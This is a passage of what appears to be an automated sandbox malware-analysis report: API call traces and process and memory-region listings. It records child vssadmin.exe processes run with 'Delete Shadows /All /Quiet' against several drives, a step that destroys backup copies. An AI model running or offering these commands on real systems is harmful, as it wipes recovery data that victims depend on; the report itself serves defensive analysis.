	[0246.400] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
	[0246.406] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
	[0246.406] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0246.406] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0246.406] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
	[0246.406] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
	[0246.406] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
	[0246.407] GetProcessHeap () returned 0x4700000
	[0246.407] RtlFreeHeap (HeapHandle=0x4700000, Flags=0x0, BaseAddress=0x4707bf0) returned 1
	[0246.407] GetProcessHeap () returned 0x4700000
	[0246.407] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0xa) returned 0x4709568
	[0246.407] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1
	[0246.412] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin  Delete Shadows /For=S: /All /Quiet ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x18f3a8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin  Delete Shadows /For=S: /All /Quiet ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f3f4 | out: lpCommandLine="vssadmin  Delete Shadows /For=S: /All /Quiet ", lpProcessInformation=0x18f3f4*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x8c, dwThreadId=0x45c)) returned 1
	[0246.436] CloseHandle (hObject=0xa4) returned 1
	[0246.436] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0246.436] GetProcessHeap () returned 0x4700000
	[0246.436] RtlFreeHeap (HeapHandle=0x4700000, Flags=0x0, BaseAddress=0x470adf0) returned 1
	[0246.436] GetEnvironmentStringsW () returned 0x470a248*
	[0246.436] GetProcessHeap () returned 0x4700000
	[0246.436] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0xb9c) returned 0x470adf0
	[0246.437] memcpy (in: _Dst=0x470adf0, _Src=0x470a248, _Size=0xb9c | out: _Dst=0x470adf0) returned 0x470adf0
	[0246.437] FreeEnvironmentStringsA (penv="=") returned 1
	[0246.437] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0
	[0262.938] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x18f38c | out: lpExitCode=0x18f38c*=0x2) returned 1
	[0262.940] CloseHandle (hObject=0xa8) returned 1
	[0262.940] _vsnwprintf (in: _Buffer=0x18f474, _BufferCount=0x13, _Format="%08X", _ArgList=0x18f394 | out: _Buffer="00000002") returned 8
	[0262.941] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1
	[0262.942] GetProcessHeap () returned 0x4700000
	[0262.942] RtlFreeHeap (HeapHandle=0x4700000, Flags=0x0, BaseAddress=0x470adf0) returned 1
	[0262.943] GetEnvironmentStringsW () returned 0x470a248*
	[0262.943] GetProcessHeap () returned 0x4700000
	[0262.943] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0xbc2) returned 0x470c568
	[0262.943] memcpy (in: _Dst=0x470c568, _Src=0x470a248, _Size=0xbc2 | out: _Dst=0x470c568) returned 0x470c568
	[0262.943] FreeEnvironmentStringsA (penv="=") returned 1
	[0262.943] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
	[0262.943] GetProcessHeap () returned 0x4700000
	[0262.943] RtlFreeHeap (HeapHandle=0x4700000, Flags=0x0, BaseAddress=0x470c568) returned 1
	[0262.944] GetEnvironmentStringsW () returned 0x470a248*
	[0262.944] GetProcessHeap () returned 0x4700000
	[0262.944] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0xbc2) returned 0x470c568
	[0262.944] memcpy (in: _Dst=0x470c568, _Src=0x470a248, _Size=0xbc2 | out: _Dst=0x470c568) returned 0x470c568
	[0262.944] FreeEnvironmentStringsA (penv="=") returned 1
	[0262.944] GetProcessHeap () returned 0x4700000
	[0262.944] RtlFreeHeap (HeapHandle=0x4700000, Flags=0x0, BaseAddress=0x4709568) returned 1
	[0262.944] DeleteProcThreadAttributeList (in: lpAttributeList=0x18f420 | out: lpAttributeList=0x18f420) 
	[0262.944] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0262.944] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1
	[0263.159] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0263.159] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x31f40c | out: lpMode=0x31f40c) returned 1
	[0263.621] _get_osfhandle (_FileHandle=0) returned 0x38
	[0263.621] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x31f408 | out: lpMode=0x31f408) returned 1
	[0263.755] SetConsoleInputExeNameW () returned 0x1
	[0263.755] GetConsoleOutputCP () returned 0x1b5
	[0263.944] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x31f460 | out: lpCPInfo=0x31f460) returned 1
	[0263.944] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0264.133] exit (_Code=2) 

Thread:
	id = 97
	os_tid = 0xae8


Process:
	id = "26"
	image_name = "vssadmin.exe"
	filename = "c:\\windows\\syswow64\\vssadmin.exe"
	page_root = "0x30d81000"
	os_pid = "0x650"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "12"
	os_parent_pid = "0x125c"
	cmd_line = "vssadmin  Delete Shadows /For=W: /All /Quiet "
	cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 1696
	        start_va = 0x10000
	          end_va = 0x2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 1697
	        start_va = 0x30000
	          end_va = 0x44fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000030000"
	        filename = ""

Region:
	              id = 1698
	        start_va = 0x50000
	          end_va = 0x8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000050000"
	        filename = ""

Region:
	              id = 1699
	        start_va = 0x90000
	          end_va = 0xcffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000090000"
	        filename = ""

Region:
	              id = 1700
	        start_va = 0xd0000
	          end_va = 0xd3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000000d0000"
	        filename = ""

Region:
	              id = 1701
	        start_va = 0xe0000
	          end_va = 0xe0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000000e0000"
	        filename = ""

Region:
	              id = 1702
	        start_va = 0xf0000
	          end_va = 0xf1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000000f0000"
	        filename = ""

Region:
	              id = 1703
	        start_va = 0x200000
	          end_va = 0x3fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000200000"
	        filename = ""

Region:
	              id = 1704
	        start_va = 0x400000
	          end_va = 0x401fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000400000"
	        filename = ""

Region:
	              id = 1705
	        start_va = 0x860000
	          end_va = 0x87dfff
	       monitored = 0
	     entry_point = 0x875810
	     region_type = mapped_file
	            name = "vssadmin.exe"
	        filename = "\\Windows\\SysWOW64\\vssadmin.exe" (normalized: "c:\\windows\\syswow64\\vssadmin.exe")

Region:
	              id = 1706
	        start_va = 0x880000
	          end_va = 0x487ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000880000"
	        filename = ""

Region:
	              id = 1707
	        start_va = 0x77040000
	          end_va = 0x771bafff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 1708
	        start_va = 0x7ea90000
	          end_va = 0x7eab2fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007ea90000"
	        filename = ""

Region:
	              id = 1709
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 1710
	        start_va = 0x7fff0000
	          end_va = 0x7df95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 1711
	        start_va = 0x7df95ae70000
	          end_va = 0x7ff95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df95ae70000"
	        filename = ""

Region:
	              id = 1712
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 1713
	        start_va = 0x7ff95b031000
	          end_va = 0x7ffffffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff95b031000"
	        filename = ""

Region:
	              id = 1725
	        start_va = 0x410000
	          end_va = 0x5dffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000410000"
	        filename = ""

Region:
	              id = 1726
	        start_va = 0x586b0000
	          end_va = 0x586fffff
	       monitored = 0
	     entry_point = 0x586c8180
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 1763
	        start_va = 0x58630000
	          end_va = 0x586a9fff
	       monitored = 0
	     entry_point = 0x58643290
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 1764
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 1765
	        start_va = 0x58700000
	          end_va = 0x58707fff
	       monitored = 0
	     entry_point = 0x587017c0
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 1797
	        start_va = 0x5e0000
	          end_va = 0x82ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000005e0000"
	        filename = ""

Region:
	              id = 1798
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 1799
	        start_va = 0x74590000
	          end_va = 0x7470dfff
	       monitored = 0
	     entry_point = 0x74641b90
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 1829
	        start_va = 0x10000
	          end_va = 0x1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 1830
	        start_va = 0x7e990000
	          end_va = 0x7ea8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007e990000"
	        filename = ""

Region:
	              id = 1897
	        start_va = 0x100000
	          end_va = 0x1bdfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 1898
	        start_va = 0x400000
	          end_va = 0x403fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000400000"
	        filename = ""

Region:
	              id = 1899
	        start_va = 0x76630000
	          end_va = 0x766aafff
	       monitored = 0
	     entry_point = 0x7664e970
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")

Region:
	              id = 1900
	        start_va = 0x76820000
	          end_va = 0x768ddfff
	       monitored = 0
	     entry_point = 0x76855630
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 1901
	        start_va = 0x1c0000
	          end_va = 0x1fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 1902
	        start_va = 0x410000
	          end_va = 0x44ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000410000"
	        filename = ""

Region:
	              id = 1903
	        start_va = 0x5d0000
	          end_va = 0x5dffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000005d0000"
	        filename = ""

Region:
	              id = 1904
	        start_va = 0x75f10000
	          end_va = 0x75f53fff
	       monitored = 0
	     entry_point = 0x75f29d80
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")

Region:
	              id = 1905
	        start_va = 0x75ba0000
	          end_va = 0x75c4cfff
	       monitored = 0
	     entry_point = 0x75bb4f00
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")

Region:
	              id = 1906
	        start_va = 0x73d70000
	          end_va = 0x73d8dfff
	       monitored = 0
	     entry_point = 0x73d7b640
	     region_type = mapped_file
	            name = "sspicli.dll"
	        filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")

Region:
	              id = 1907
	        start_va = 0x73d60000
	          end_va = 0x73d69fff
	       monitored = 0
	     entry_point = 0x73d62a00
	     region_type = mapped_file
	            name = "cryptbase.dll"
	        filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")

Region:
	              id = 1908
	        start_va = 0x73e10000
	          end_va = 0x73e67fff
	       monitored = 0
	     entry_point = 0x73e525c0
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")

Region:
	              id = 1909
	        start_va = 0x76950000
	          end_va = 0x76a96fff
	       monitored = 0
	     entry_point = 0x76961cf0
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")

Region:
	              id = 1931
	        start_va = 0x6f9d0000
	          end_va = 0x6f9e7fff
	       monitored = 0
	     entry_point = 0x6f9d4820
	     region_type = mapped_file
	            name = "atl.dll"
	        filename = "\\Windows\\SysWOW64\\atl.dll" (normalized: "c:\\windows\\syswow64\\atl.dll")

Region:
	              id = 1932
	        start_va = 0x75dc0000
	          end_va = 0x75f0efff
	       monitored = 0
	     entry_point = 0x75e76820
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")

Region:
	              id = 1933
	        start_va = 0x6f9b0000
	          end_va = 0x6f9c0fff
	       monitored = 0
	     entry_point = 0x6f9b4670
	     region_type = mapped_file
	            name = "vsstrace.dll"
	        filename = "\\Windows\\SysWOW64\\vsstrace.dll" (normalized: "c:\\windows\\syswow64\\vsstrace.dll")

Region:
	              id = 1934
	        start_va = 0x76cf0000
	          end_va = 0x76d81fff
	       monitored = 0
	     entry_point = 0x76d28cf0
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")

Region:
	              id = 1935
	        start_va = 0x73ed0000
	          end_va = 0x7408cfff
	       monitored = 0
	     entry_point = 0x73fb2a10
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")

Region:
	              id = 1936
	        start_va = 0x766b0000
	          end_va = 0x766f4fff
	       monitored = 0
	     entry_point = 0x766cde90
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")

Region:
	              id = 1937
	        start_va = 0x6f890000
	          end_va = 0x6f9aafff
	       monitored = 0
	     entry_point = 0x6f8d0930
	     region_type = mapped_file
	            name = "vssapi.dll"
	        filename = "\\Windows\\SysWOW64\\vssapi.dll" (normalized: "c:\\windows\\syswow64\\vssapi.dll")

Region:
	              id = 1938
	        start_va = 0x76aa0000
	          end_va = 0x76afefff
	       monitored = 0
	     entry_point = 0x76aa4af0
	     region_type = mapped_file
	            name = "ws2_32.dll"
	        filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")

Region:
	              id = 1953
	        start_va = 0x450000
	          end_va = 0x48ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000450000"
	        filename = ""

Region:
	              id = 1954
	        start_va = 0x450000
	          end_va = 0x479fff
	       monitored = 0
	     entry_point = 0x455680
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")

Region:
	              id = 1955
	        start_va = 0x480000
	          end_va = 0x48ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000480000"
	        filename = ""

Region:
	              id = 1956
	        start_va = 0x4880000
	          end_va = 0x4a07fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004880000"
	        filename = ""

Region:
	              id = 1957
	        start_va = 0x75b70000
	          end_va = 0x75b9afff
	       monitored = 0
	     entry_point = 0x75b75680
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")

Region:
	              id = 1958
	        start_va = 0x450000
	          end_va = 0x45cfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "vssadmin.exe.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\vssadmin.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\vssadmin.exe.mui")

Region:
	              id = 1959
	        start_va = 0x4a10000
	          end_va = 0x4b90fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004a10000"
	        filename = ""

Region:
	              id = 1960
	        start_va = 0x4ba0000
	          end_va = 0x5f9ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004ba0000"
	        filename = ""

Region:
	              id = 1961
	        start_va = 0x20000
	          end_va = 0x20fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000020000"
	        filename = ""

Region:
	              id = 1962
	        start_va = 0x460000
	          end_va = 0x460fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000460000"
	        filename = ""

Region:
	              id = 1963
	        start_va = 0x470000
	          end_va = 0x473fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000470000"
	        filename = ""

Region:
	              id = 1981
	        start_va = 0x490000
	          end_va = 0x579fff
	       monitored = 0
	     entry_point = 0x4cd650
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")

Region:
	              id = 1986
	        start_va = 0x764a0000
	          end_va = 0x764abfff
	       monitored = 0
	     entry_point = 0x764a3930
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")

Region:
	              id = 2408
	        start_va = 0x490000
	          end_va = 0x490fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000490000"
	        filename = ""

Region:
	              id = 2409
	        start_va = 0x76700000
	          end_va = 0x76783fff
	       monitored = 0
	     entry_point = 0x76726220
	     region_type = mapped_file
	            name = "clbcatq.dll"
	        filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll")

Region:
	              id = 2410
	        start_va = 0x4a0000
	          end_va = 0x4a0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000004a0000"
	        filename = ""

Region:
	              id = 2490
	        start_va = 0x4b0000
	          end_va = 0x4effff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000004b0000"
	        filename = ""

Region:
	              id = 2491
	        start_va = 0x4f0000
	          end_va = 0x52ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000004f0000"
	        filename = ""

Region:
	              id = 2507
	        start_va = 0x530000
	          end_va = 0x56ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000530000"
	        filename = ""

Region:
	              id = 2508
	        start_va = 0x570000
	          end_va = 0x5affff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000570000"
	        filename = ""

Region:
	              id = 2509
	        start_va = 0x5e0000
	          end_va = 0x61ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000005e0000"
	        filename = ""

Region:
	              id = 2510
	        start_va = 0x620000
	          end_va = 0x65ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000620000"
	        filename = ""

Region:
	              id = 2511
	        start_va = 0x730000
	          end_va = 0x82ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000730000"
	        filename = ""

Region:
	              id = 3036
	        start_va = 0x5fa0000
	          end_va = 0x607ffff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "kernelbase.dll.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui")

Region:
	              id = 3046
	        start_va = 0x660000
	          end_va = 0x6dffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000660000"
	        filename = ""

Region:
	              id = 3058
	        start_va = 0x5b0000
	          end_va = 0x5b8fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "vsstrace.dll.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\vsstrace.dll.mui")


Thread:
	id = 83
	os_tid = 0x13e4


Thread:
	id = 90
	os_tid = 0x1388


Thread:
	id = 122
	os_tid = 0xbec


Thread:
	id = 126
	os_tid = 0x460


Thread:
	id = 128
	os_tid = 0xb10


Process:
	id = "27"
	image_name = "vssadmin.exe"
	filename = "c:\\windows\\syswow64\\vssadmin.exe"
	page_root = "0x6fb16000"
	os_pid = "0x56c"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "13"
	os_parent_pid = "0x1324"
	cmd_line = "vssadmin  Delete Shadows /For=V: /All /Quiet "
	cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 1745
	        start_va = 0x10000
	          end_va = 0x2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 1746
	        start_va = 0x30000
	          end_va = 0x44fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000030000"
	        filename = ""

Region:
	              id = 1747
	        start_va = 0x50000
	          end_va = 0x8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000050000"
	        filename = ""

Region:
	              id = 1748
	        start_va = 0x90000
	          end_va = 0xcffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000090000"
	        filename = ""

Region:
	              id = 1749
	        start_va = 0xd0000
	          end_va = 0xd3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000000d0000"
	        filename = ""

Region:
	              id = 1750
	        start_va = 0xe0000
	          end_va = 0xe0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000000e0000"
	        filename = ""

Region:
	              id = 1751
	        start_va = 0xf0000
	          end_va = 0xf1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000000f0000"
	        filename = ""

Region:
	              id = 1752
	        start_va = 0x200000
	          end_va = 0x3fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000200000"
	        filename = ""

Region:
	              id = 1753
	        start_va = 0x5a0000
	          end_va = 0x5a1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000005a0000"
	        filename = ""

Region:
	              id = 1754
	        start_va = 0x860000
	          end_va = 0x87dfff
	       monitored = 0
	     entry_point = 0x875810
	     region_type = mapped_file
	            name = "vssadmin.exe"
	        filename = "\\Windows\\SysWOW64\\vssadmin.exe" (normalized: "c:\\windows\\syswow64\\vssadmin.exe")

Region:
	              id = 1755
	        start_va = 0x880000
	          end_va = 0x487ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000880000"
	        filename = ""

Region:
	              id = 1756
	        start_va = 0x77040000
	          end_va = 0x771bafff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 1757
	        start_va = 0x7eb40000
	          end_va = 0x7eb62fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007eb40000"
	        filename = ""

Region:
	              id = 1758
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 1759
	        start_va = 0x7fff0000
	          end_va = 0x7df95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 1760
	        start_va = 0x7df95ae70000
	          end_va = 0x7ff95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df95ae70000"
	        filename = ""

Region:
	              id = 1761
